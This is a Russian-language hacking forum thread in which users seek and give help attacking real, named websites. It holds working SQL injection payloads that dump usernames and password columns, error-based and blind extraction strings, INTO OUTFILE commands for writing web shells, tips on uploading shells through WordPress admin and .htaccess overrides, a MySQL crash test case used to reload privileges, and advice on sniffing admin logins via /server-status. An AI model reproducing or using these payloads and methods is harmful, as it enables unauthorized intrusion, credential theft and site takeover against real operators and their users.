stan_q said:
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается?


load_file('/etc/passwd')

так иногда можно через скулю путь посмотреть

er9j6@ said:
load_file('/etc/passwd')
так иногда можно через скулю путь посмотреть


Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/

ЗЫ Почему-то при написании в адресной строке браузера load_file('/etc/passwd') сайт подвисает, а если захексить - то все норм. И такое на всех сайтах и всех основных браузерах...

stan_q said:
Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/


Тогда в базе поищи, например у Joomla в таблице jos_session и колонка data путь прописан

подскажите, это инъекция? в конце fid


http://onlineracer.softgames.de/softgames/mobile/index_softgames.php?token=8EFCF9FAD3B2A421038C4CE2 FB2DC0C7&sig=D8849E4E00B50E2E120D56366B072D1E&api_id=2446802&referrer=user_apps&method=getenemygarage&fid=1'


(пробелы убрать)

если да, то как от туда данные вытащить? пробовал, не получается

stan_q said:
Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/


дальше и на угад можно, ведь не такуж и много вариантов, советую почитать

http://mh-proxy.ru/blog/index.php?mod=read&id=15


LomasterII said:
подскажите, это инъекция? в конце fid
(пробелы убрать)
если да, то как от туда данные вытащить? пробовал, не получается




PHP:
http://onlineracer.softgames.de/softgames/mobile/index_softgames.php?token=8EFCF9FAD3B2A421038C4CE2 FB2DC0C7&sig=D8849E4E00B50E2E120D56366B072D1E&api_id=2446802&referrer=user_apps&method=getenemygarage&fid=1+and%28select*from%28select%28name_const%28ve rsion%28%29,1%29%29,name_const%28version%28%29,1%2 9%29a%29and%281%29=%201

column name '5.1.63-0+squeeze1-log''

stan_q said:
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.


пытайся найти phpinfo

stan_q said:
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.


1)Попробуй

/etc/httpd/vhosts/default.conf

/etc/httpd/vhosts/(домен).conf

2)Прогони сканером директорий на стандартные пути к файлу с phpinfo(); (часто оставляют в корне web директории что-нибудь типа info.php, phpinfo.php, 1.php, и так далее) . там можно будет прочитать путь.

3) Посмотри что еще за сайты на сервере (можно здесь http://madnet.name/tools/madss/ ), спровоцируй ошибку на других доменах, так же попробуй найти на них пхпинфо, по шаблону подобрать путь к основной жертве.

testvanieva.kz/login.php?language=../index

дальше можно как-нибудь?

http://copywri[delete]terbox.com/announcement.php?id=4+and+5=5
http://copyw[delete]riterbox.com/article.php?id=25+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18--


Кто может раскрутить это не блайндом а чтобы вывод был нормальный ? Там походу какойто фильтр на union

Для авторизации trol@mailforspam.com:123456

del/

Приветствую мужики! Есть доступ в админку WordPress. Заливаю шелл через Plugin Insallation. Смотрю в Library путь к этому шеллу. Захожу на него и получаю 403 You don't have permission to access... Почему такое происходит? И как решить данную проблему? Спасибо.

passwd said:
Приветствую мужики! Есть доступ в админку WordPress. Заливаю шелл через Plugin Insallation. Смотрю в Library путь к этому шеллу. Захожу на него и получаю 403 You don't have permission to access... Почему такое происходит? И как решить данную проблему? Спасибо.


потомучто в хтаккесс запрещен посиотр дериктории, залейся в корень $_SERVER['DOCUMENT_ROOT']

OxoTnik said:
залить в другую дерикторию, в шаблон например мини шелл


А как в другую директорию залить? Если вместе с темой, то она автоматом падает zip архивом в дефолтную папку. И лежит там простым архивчиком. Для установки темы нужен ftp пароль. В Media Settings убрал галочку с "Organize my uploads into month- and year-based folders". Начало заливать всё в wp-content/uploads, но оттуда так же 403 выдает. Мини шелл так же блокируется.

passwd said:
А как в другую директорию залить? Если вместе с темой, то она автоматом падает zip архивом в дефолтную папку. И лежит там простым архивчиком. Для установки темы нужен ftp пароль. В Media Settings убрал галочку с "Organize my uploads into month- and year-based folders". Начало заливать всё в wp-content/uploads, но оттуда так же 403 выдает. Мини шелл так же блокируется.


зачем же так извращатся? залей через редактирование шаблона,

С удовольствием залил бы, но при редактировании шаблонов, и плагинов: "You need to make this file writable before you can save your changes."

Так как залить в корень? Подскажет кто?

кто может помочь есть сайт (в личку) CMS Айсберг (если я правильно определил), в havaj 1.6 инъекция раскручивается нормально, но вот понять где в БД пароль хранится и хранится ли он вообще в БД не пойму. уже несколько дней изучаю их БД успехов ноль.

OxoTnik said:
может в другой БД?


сразу подумал об этом, но там только одна БД

кстати вход в админку там через CPanel, может это как то поможет

OxoTnik said:
редактировать пути для плагинов пробовал?


А где их можно отредактировать? В "Permalink Settings"? Там ведь вроде только URL редактируются.

biaktrisa said:
сразу подумал об этом, но там только одна БД
кстати вход в админку там через CPanel, может это как то поможет


Cpanel - это не совсем админка сайта. Это что-то на подобие админки хостинга.

Найти админку можешь с помощью такого php скрипта

[PHP]
PHP:
[COLOR="#0000BB"][COLOR="#007700"]

Получил доступ к админ панели одного сайта, пытаюсь залить шелл, нашел только одну папку в которую можно залить. Залил, казалось бы все ок. Пробую выполнить залитый шелл, вываливается такая шляпа:


Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@rockunion.ie and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


.htaccess'a в папке не лежит, кто что может предложить?

P.s. любые файлы на пыхе работать категорически отказываются.

passwd said:
Найти админку можешь с помощью такого php скрипта


эти пути уже давно пробил результат 0


passwd said:
А пароль и имя пользователя чаще всего хранятся в таблицах:
user, users, admin, admin_users, login и т.д.
Тебе же нужно просто просмотреть все таблицы и найти хоть что-то где может быть написано password, pwd, passwd.


все найденные уже пробил, паролей 0 их вообще нет, хотя кое какие логины нашел

J.Z. said:
Получил доступ к админ панели одного сайта, пытаюсь залить шелл, нашел только одну папку в которую можно залить. Залил, казалось бы все ок. Пробую выполнить залитый шелл, вываливается такая шляпа:
.htaccess'a
в папке не лежит, кто что может предложить?
P.s. любые файлы на пыхе работать категорически отказываются.


залей свой хтаккес с разришением выполнеения пыха в картинках


biaktrisa said:
эти пути уже давно пробил результат 0
все найденные уже пробил, паролей 0 их вообще нет, хотя кое какие логины нашел


значит сайт без админки, поетому и паролей нет

Есть сайт с уязвимым полем &id=5151

Ставлю в конце ковычку одинарную &id=5151' - вот что получаю в ответ:

MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1

Query: SELECT `id`, `name`, `uniqum`, `image`, `catsID` FROM `ap_products` WHERE `enable`=1 AND `id` IN(0,5151')

Есть исходный код данного участка кода:


PHP:
$sql='SELECT `id`, `name`, `uniqum`, `image`,� �`catsID`,`in_stock`,`cant_buy` FROM `'.$DB_pref ix.'products` WHERE `enable`=1 AND `id` IN ( 0,';

foreach($BasketAS$code=>$bskt)

$sql.=$code.',';

$sql=substr($sql,0,-1).')';

$sql=query($sql);

Подскажите, как правильно составить запрос, чтобы выполнилась скуль?

Ставлю в конце ковычку одинарную &id=5151' - вот что получаю в ответ:
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Query: SELECT `id`, `name`, `uniqum`, `image`, `catsID` FROM `ap_products` WHERE `enable`=1 AND `id` IN(0,5151')


Думаю, нужно попробовать так

&id=5151)+and+1=2+union+select+111,222,333,444,555+--+

Ну и понеслась...

Имеется сайт с sql injection вида:

http://site/id/5

Комменты не срабатывают. Пришлось проэксплуатировать баг так:

http://site/id/5'and(mid(version(),1,1)=5)and'1

Как все это дело автоматизировать в sqlmap? ЧПУ...

как правильно составить запрос в vBulletin 4.0.3 что бы получить префикс к таблицам?


&cat[0]=1) union select concat(username,0x3a,email,0x3a,password,0x3a,salt ) from user where usergroupid=6#


вот так ошибка в исходнике страници пишет что такой таблици не существует

Rurr said:
как правильно составить запрос в vBulletin 4.0.3 что бы получить префикс к таблицам?
вот так ошибка в исходнике страници пишет что такой таблици не существует


&cat[0]=1) union select table_name from information_schema.tables limit 0,1#

и перебирай через limit пока свою таблицу не найдешь.

А чуть выше префикс написан парой строчек выше верно?


а это не имя базы разве?

Есть скуль MySQL error based

.php?avto=5+and(select+1+from(select+count(*),conc at((select+(select+concat(0x7e,0x27,unhex(Hex(cast (user()+as+char))),0x27,0x7e))+from+`information_s chema`.tables+limit+0,1),floor(rand(0)*2))x+from+` information_schema`.tables+group+by+x)a)+and+1=1

При таком запросе, вытает:

Ошибка SQL запросаDuplicate entry '~'user_mysql@localhost'~1' for key 'group_key'

Подскажите как правильно составить запрос чтобы залить напрямую шелл? Знаю полный путь и что file_priv = Y

Evil_Genius said:
Есть скуль MySQL error based
.php?avto=5+
and(select+1+from(select+count(*),concat((select+( select+concat(0x7e,0x27,unhex(Hex(cast(user()+as+c har))),0x27,0x7e))+from+`information_schema`.table s+limit+0,1),floor(rand(0)*2))x+from+`information_ schema`.tables+group+by+x)a)+and+1=1
При таком запросе, вытает:
Ошибка SQL запросаDuplicate entry '~'
user_mysql@localhost
'~1' for key 'group_key'
Подскажите как правильно составить запрос чтобы залить напрямую шелл? Знаю полный путь и что file_priv = Y



клац (http://mh-proxy.ru/blog/index.php?mod=read&id=15)

Ну вот я делаю по такому плану чтобы узнать file_priv:

597+and(select+1+from(select+count(*),concat((sele ct+(select+concat(0x7e,0x27,grant_priv,0x27,0x7e)) +from+mysql.user+where+user='root'+limit+0,1),floo r(rand(0)*2))x+from+`information_schema`.tables+gr oup+by+x)a)+and+1=1

Мне выдает:

Ошибка SQL запроса Duplicate entry '~'Y'~1' for key 'group_key'

Далее делаю заливку файла:

597+and(select+1+from(select+count(*),concat((sele ct+(select+concat(0x7e,0x27,'123456',0x27,0x7e))+f rom+mysql.user+into+outfile+'/var/www/admin/data/www/site.ru/news/images/1.txt'+limit+0,1),floor(rand(0)*2))x+from+`informa tion_schema`.tables+group+by+x)a)+and+1=1

На что мне выдает:

Ошибка SQL запроса You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and' at line 1

Где ошибка?

Evil_Genius said:
Ну вот я делаю по такому плану чтобы узнать file_priv:
597
+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,grant_priv,0x27,0x7e))+fr om+mysql.user+where+user='root'+limit+0,1),floor(r and(0)*2))x+from+`information_schema`.tables+group +by+x)a)+and+1=1
Мне выдает:
Ошибка SQL запроса Duplicate entry '~'
Y
'~1' for key 'group_key'
Далее делаю заливку файла:
597
+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,'123456',0x27,0x7e))+from +mysql.user+into+outfile+'/var/www/admin/data/www/site.ru/news/images/1.txt'+limit+0,1),floor(rand(0)*2))x+from+`informa tion_schema`.tables+group+by+x)a)+and+1=1
На что мне выдает:
Ошибка SQL запроса You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
'limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and'
at line 1
Где ошибка?


в blind sql-inj, это делается, как правило таким образом


Code:
?var=data' LIMIT 1 INTO OUTFILE '/home/path/site/shell.php' LINES TERMINATED BY ''-- 1

Evil_Genius said:
Где ошибка?


Ты узнаешь grant_priv, а не file_priv. И зачем писать запрос для вывода ошибки, если можно выполнить простой подзапрос?


Code:
+and(select'123'into+outfile+'/tmp/gg.txt')+and+1=1

Havij+Sniffer = Bad.

P.S. Нашел сайт, льется нормально:

news/images/aa.php?a=phpinfo();

Есть проблема:

SQL фильтрует скобки () то есть запрос просто останавливается… впринципе возможно раскрутить и без скобок в особом случае, но и тут облом - при выводе из базы она ругается на несоответствующий тип данных, то есть информацию из базы надо конвертировать во что то, а конверт функции разумеется юзают (), поэтому как быть, я затрудняюсь.

Как быть?

Может попробовать на прямую сделать запрос на стандартные пользовательские таблы или как вариант за хексить колонки, там не используются скобки, следущий как вариант попробовать найти подзапрос на вывод таблы, изредко но поподается, если есть префикс при выводе ошибки и знакомая цмс, то оброщайся на прямую, бывают еще такие случаи что подобные ошибки в скулях индексируются ПС, т.е как вариант...

winstrool said:
Может попробовать на прямую сделать запрос на стандартные пользовательские таблы или как вариант за хексить колонки, там не используются скобки, следущий как вариант попробовать найти подзапрос на вывод таблы, изредко но поподается, если есть префикс при выводе ошибки и знакомая цмс, то оброщайся на прямую, бывают еще такие случаи что подобные ошибки в скулях индексируются ПС, т.е как вариант...


1) искать подзапросы не вариант, и в нашем случае его однозначно нету.

2) если найти пользовательские таблицы, то будет тоже самое, инфу выводить как? будет несоответствие типов данных.

3) по поводу захексить колонки без () это как? непонел. Покажи пример, пожалуйста.

preno said:
1) искать подзапросы не вариант, и в нашем случае его однозначно нету.
2) если найти пользовательские таблицы, то будет тоже самое, инфу выводить как? будет несоответствие типов данных.
3) по поводу захексить колонки без () это как? непонел. Покажи пример, пожалуйста.


пример вывода таблиц:

select 1,2,table_name,3,4 from information_schema.tables limit x,1#

Пример вывода колонок:

select 1,2,column_name,3,4 from information_schema.columns where table_name=0x[hex значение таблы юзеров] limit x,1#

Пример вывода значений из пользовательских табл:

select 1,2,user,password from [пользовательская табла]

С хексом бывает, срабатывают изредко такие слечия:

Пример вывода значений из пользовательских табл:

select 1,2,0x[user],0x[password0] from[пользовательская табла]

winstrool said:
пример вывода таблиц:
select 1,2,table_name,3,4 from information_schema.tables limit x,1#
Пример вывода колонок:
select 1,2,column_name,3,4 from information_schema.columns where table_name=0x[hex значение таблы юзеров] limit x,1#
Пример вывода значений из пользовательских табл:
select 1,2,user,password from [пользовательская табла]
С хексом бывает, срабатывают изредко такие слечия:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]


твой пример:

select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user

preno said:
твой пример:
select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user


Каждый случай в скулях индивидуальный, тут экстросенсов вроде как нет!!!

winstrool said:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]


Жестко.

preno said:
твой пример:
select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user


вместо 0x75736572 попробуй unhex(hex(user))

YaBtr said:
вместо
0x75736572
попробуй
unhex(hex(user))


сказано же - нельзя юзать ()

Вы читайте прежде,чем советовать.

С одного шелла подключился с БД другого сервера, у юзера под которым подключился file_priv=N, но можно изменять данные в БД mysql.user изменил file_priv на Y, но шелл всё равно не заливается. пишет что для моего юзера не хватает прав. Что можно предпринять?

winstrool said:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]


Эта пять!

preno, если нужна конвертация - то нужны и скобки. Ничего ты тут не сделаешь, если фильтрует их ваф грамотно. Вопрос в другом, это дествительно ваф? Он дествительно нормально фильтрует? Или это в коде проверка, или что это?

Ну и второй вариант - искать поле вывода, в котором данные нужного типа, а тут как это не странно гений хака даёт единственный правильный ответ за всю историю своих постов :


winstrool said:
Каждый случай в скулях индивидуальный, тут экстросенсов вроде как нет!!!


а я, к своему прискорбию, вынужден заметить, что был не прав, и у него бывают удачные посты!

system331 said:
С одного шелла подключился с БД другого сервера, у юзера под которым подключился file_priv=N, но можно изменять данные в БД mysql.user изменил file_priv на Y, но шелл всё равно не заливается. пишет что для моего юзера не хватает прав. Что можно предпринять?


Нужно обновить привелегии. Как это сделать - я писал в своём небольшом обзоре тут (https://rdot.org/forum/showpost.php?p=28278&postcount=21)

На всякий случай - вот копипаст

Итак, если нам вдруг понадобится срочно перезагрузить MySQL, а прав на RELOAD нет, чтобы выполнить

FLUSH PRIVILEGES;

нам могут помочь следующие способы:

Способ №1:

Самый старый из найденных мной, но ни разу нигде не сработавших.

Тем не менее человек на этом форуме утверждает, что это возможно...

Тема 2008 года =)

Кратко: MySQL падает так как надо указывать имя триггера в виде `mydb`.`mytrigger`, а не просто mytrigger.


Code:
mysql> CREATE TRIGGER mytrigger AFTER INSERT
-> ON `mydb`.`mytable` FOR EACH ROW
-> BEGIN END;
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>

OC = Windows XP SP 2

MySQL 5.0.16

Результат - Способ не отработал.

Способ №2:

Заключается в эксплуатации бага #63775

Кратко: MySQL падает при чтении заголовка, следующего за удалённой записью.


Code:
#
# Bug#13510739 63775: SERVER CRASH ON HANDLER READ NEXT AFTER DELETE RECORD.
#

-- source include/have_innodb.inc

CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;

INSERT INTO bug13510739 VALUES (1), (2), (3), (4);

DELETE FROM bug13510739 WHERE c=2;

HANDLER bug13510739 OPEN;

HANDLER bug13510739 READ `primary` = (2);

# this one crashes the server IF the bug IS present
HANDLER bug13510739 READ `primary` NEXT;

DROP TABLE bug13510739;


На оффициальном сайте говорится, что пофиксено начиная с версии 5.1.62

Решил испытать на своей системе, где версия MySQL 5.1.61.

Зависимости:

MySQL 3
[/B]

Результат - успешный перезапуск MySQL. PROFIT !!!

BigBear, спасибо, шелл залит.

Сервак на фряхе, gcc нет, Кто-нибудь подскажетт как скомпилировать исходники сплойта под freebsd из под debian )

Где хранятся файлы паролей от админки Webmin на сервере? и какой алгоритм там?

Почему кавычки передаваемые через гет, пост могут слешироватся ?

При этом мэджик квотес офф, смотрел через пхпинфо.

Переменная эта ничем не обрабатывается, мб гдето в недрах глобально только, ковыряюсь в плагине вордпресса.

В чем может быть проблема ?

trololoman96 said:
Почему кавычки передаваемые через гет, пост могут слешироватся ?
При этом мэджик квотес офф, смотрел через пхпинфо.
Переменная эта ничем не обрабатывается, мб гдето в недрах глобально только, ковыряюсь в плагине вордпресса.
В чем может быть проблема ?


может быть все таки замена по регулярке идет

В самом плагине я не нашел ничего такого.

Там где я нашел типа потенциальную иньекцию обрашения происходят либо через файл wp-admin/admin-ajax.php, в клиентской части. И через админку, через edit.php со своим типом страницы и обработчиками в плагине.

Вот там и происходит экранирование.

Если интересно, могу скинуть плагин в личку и показать те места что нашел. Единственное попрошу не сливать инфу о плагине в паблик, ибо он платный и достаточно популярный в рунете.

Всем привет!

Кто подскажет,есть сайт ......../wechselbude/index.php?page=content&name=info

Если сделать так ......../wechselbude/index.php?page=content&name=(SELECT%20CONCAT(version(),user(),database()) )

то выводит version 5.1.66-nmm3-log

user d01333ce@localhost

db d01333ce

но дальше вообще никак ни через union ни через and,

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/w00db281/wechselbude/content/content.php on line 6

Я с этими инклудами вообще не дружу

wkuzy,


http://hammjue.at/wechselbude/index.php?page=content&name=((select table_name from information_schema.tables limit 1,1))

trololoman96 said:
wkuzy,


Спасибо ,дальше я сам

пытаюсь девочке помочь с хреновым контестом.

уверен что саит написан по левому.

кто поможет закачать шелл, или пробить SQL иньекцыю чтоб увеличить девочке колво votes?

саит; http://whowearsitbetter.com/2july.php

помогаю подруге и учусь уму разуму, помошь отблагадорю через paypal.

ты когда в послендии раз первыи пост етои темы читал?

HAXTA4OK said:
может быть все таки замена по регулярке идет


Я нашел проблему. В файле самого вп. В wp-includes/load.php есть такое:


Code:
// Escape with wpdb.
$_GET = add_magic_quotes( $_GET );
$_POST = add_magic_quotes( $_POST );
$_COOKIE = add_magic_quotes( $_COOKIE );
$_SERVER = add_magic_quotes( $_SERVER );

// Force REQUEST to be GET + POST.
$_REQUEST = array_merge( $_GET, $_POST );

и сам код функции add_magic_quotes


Code:
function add_magic_quotes( $array ) {
foreach ( (array) $array as $k => $v ) {
if ( is_array( $v ) ) {
$array[$k] = add_magic_quotes( $v );
} else {
$array[$k] = addslashes( $v );
}
}
return $array;
}

Эта фигня портит всю малину. Я так понимаю что тут уже ничего не сделать ?

Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?

Br@!ns said:
Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?


Ты только адрес админ-панели максимум выловишь.

Не, ну если авторизация идёт через GET - То да, поймаешь аутентификационные данные.

А так, максимум - адрес админ панели.

есть Phpmyadmin: 3.3.7deb7

можно ли на нем раскрыть пути? есть права рута

BigBear said:
Ты только адрес админ-панели максимум выловишь.
Не, ну если авторизация идёт через GET - То да, поймаешь аутентификационные данные.
А так, максимум - адрес админ панели.


Именно так, запросы и через GET тоже идут. Вот и хотелось бы все эти постояннообновляющиеся запросы куда нибудь логировать или парсить в режиме реального времени, возможно ли это как нибудь сделать?

Br@!ns said:
Именно так, запросы и через GET тоже идут. Вот и хотелось бы все эти постояннообновляющиеся запросы куда нибудь логировать или парсить в режиме реального времени, возможно ли это как нибудь сделать?


Ну тебе никто не мешает цеплять на страницу /server-status и парсить её содержимое. Хоть запарся.

Единственное что - ты увидешь все запросы как от клиентов, так и от админов, а если сайт высокопосещаемый, то этих запросов будут тысячи, миллионы, сможешь ли ты выловить иголку в стоге сена ???

Самое простое - дождаться когда админ будет в сети, напечатать мат к любой новости и пожаловаться на него. И ждать пока админ его почистит, при этом мониторить /server-status. Если комментарии удаляются через админку - есть шанс увидеть её адрес.

ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar=237760&repairRelam=fun

что мне с теперь можно с этим делать?

это случайно не скуль инъекция?

прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом

HACKTEAM said:
ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar=237760&repairRelam=fun
что мне с теперь можно с этим делать?
это случайно не скуль инъекция?
прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом


ничего,но надежда есть всегда. На сервере стоит форум Invision Power Board 3.4,попробуй в привате сплоит поискать

http://forum.wow-cool.ru/admin/upgrade/index.php?app=upgrade&s=&section=index&do=login

Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов

zeoman said:
Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов


/showthread.php?t=103576

https://rdot.org/forum/showthread.php?t=1116

http://hawk.ru/toto.php?n_nomer=-3

Можно ли по этой ошибке чо нибудь получить?

Br@!ns said:
http://hawk.ru/toto.php?n_nomer=-3
Можно ли по этой ошибке чо нибудь получить?


Можно блиндом получить

http://hawk.ru/toto_stat_day.php?n_kogda=20120904%20and%20(select %20ord(substr(@@version,1,1))%20)=53

5.0.51-log

help


asiaman said:
Подскажите, кто-нибудь пользовался данной багой?
Если наглядный пример использования?
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1180
Nginx buffer underflow vulnerability
Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
Affected items
Web Server
The impact of this vulnerability
Remote attackers may execute arbitrary code via crafted HTTP requests.



актуально, что можно с этим сделать

Подскажите:

жертва - ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16

узнаю названия таблиц - ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()

узнаю название столбцов - http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()

на выходе имею такую связку (таблица - user, столбцы - userName,userPass)

ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users

и получаю:

Invalid query: Unknown column 'userPass' in 'field list'

Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её YaBTR и вот вариант рабочий:

ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_concat(userpwd,0x3a,use r rights),version(),4,5+from+users--

Где и как найти эти userpwd,0x3a,user rights

usupekx said:
Подскажите:
жертва
- ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16
узнаю названия таблиц
- ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()
узнаю название столбцов
- http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()
на выходе имею такую связку (таблица -
user
, столбцы - userName,userPass)
ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from
users
и получаю:
Invalid query: Unknown column 'userPass' in 'field list'
Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её
YaBTR
и вот вариант рабочий:
ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_concat(
userpwd,0x3a,user rights
),version(),4,5+from+users--
Где и как найти эти
userpwd,0x3a,user rights


может просто внимательней быть?

>>Где и как найти эти userpwd,0x3a,user rights

0x3a - это хекс код разделителя, а остальные - названия столбцов таблицы. Как найти написано в статье Dr.Zero

BlackIce said:
может просто внимательней быть?
>>Где и как найти эти userpwd,0x3a,user rights
0x3a - это хекс код разделителя, а остальные - названия столбцов таблицы. Как найти написано в статье Dr.Zero


действительно, описАлся. Но, увы, не помогло

читал не раз статью эту и нетолько её. про хекс это понятно, просто вставил.

попробую конкретнее задать вопрос. может ли быть такое что только брут форсом будут подобраны названия столбцов? Или всё-таки их можно выудить?

usupekx said:
Подскажите:
жертва
- ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16
узнаю названия таблиц
- ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()
узнаю название столбцов
- http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()
на выходе имею такую связку (таблица - user, столбцы - userName,userPass)
ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users
и получаю:
Invalid query: Unknown column 'userPass' in 'field list'
Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её
YaBTR
и вот вариант рабочий:
ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,group_concat(
userpwd,0x3a,user rights
),version(),4,5+from+users--
Где и как найти эти
userpwd,0x3a,user rights




Code:
http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),3,4,5,6--+



Code:
http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select (@x:=0x00),(select(0)from(web_terrapex_ca.intranet users)where(0x00)in(@x:=concat(@x,0x3c62723e,userN ame,0x3a,userPass))))x),3,4,5,6--+



Code:
http://terrapex.ca/en/realisation.php?larealisation=x&id=(16)and(0)union+select+1,(select(@x)from(select (@x:=0x00),(select(0)from(web_terrapex_ca.users)wh ere(0x00)in(@x:=concat(@x,0x3c62723e,userrights,0x 3a,userpwd))))x),3,4,5,6--+

хтонить в курсе, есть ли в БД ждомлы запись о том какой домен пренадлежит базе? ато так пробежался и ничего путного не нашол

qaz said:
хтонить в курсе, есть ли в БД ждомлы запись о том какой домен пренадлежит базе? ато так пробежался и ничего путного не нашол


Точный адрес в БД Jooml'ы не прописан, наксколько мне известно, но возможно возможно подскажет следующее:

1. Select email from jos_users where usertype='Super Administrator'

Смотрим мыло админа, довольно часто бывает что в названии админского мыла указывается источник на домен, например admin@искомый_домен.com. Если же нет, и там просто мыло типа mail.ru, то можно пройти сюда 2ip.ru/domain-list-by-email/, вести полученное мыло, и если повезет и поиск выдаст какие-то домены, найти те, сайты которых на Jooml'e. Возможно искомый домен окажется в этом списке.

2. Select title from jos_categories

Получаем заголовки страниц, хранящихся в БД. Далее идем в гугл и составляем поисковый запрос, что-то типа intitle:"Полученный title". Опять таки, если повезет, то в выдаче гугла можно найти сайт по искомому заголовку.

3. Просто посмотреть на сайты, находящиеся на этом ip, если их там не много, и не влом этим заниматься, то отсеять все, которые не на Jooml'e, ну а в оставшиеся попытаться войти, используя полученные данные из jos_users. Авось повезет.

Но, это все конечно не панацея и не дает 100% результат в поиске искомого домена. Так, информация к размышлению, скорее

Подскажите возможно ли как-то автоматически скопировать все ссылки сайтов из гугла по определённому запросу,чтоб не копировать всё по одному?Спасибо.

Никто не в курсе?

Sat-hacker said:
Никто не в курсе?


пишешь скрипт парсера выдачи и парсишь, проблем?

Га-Ноцри said:
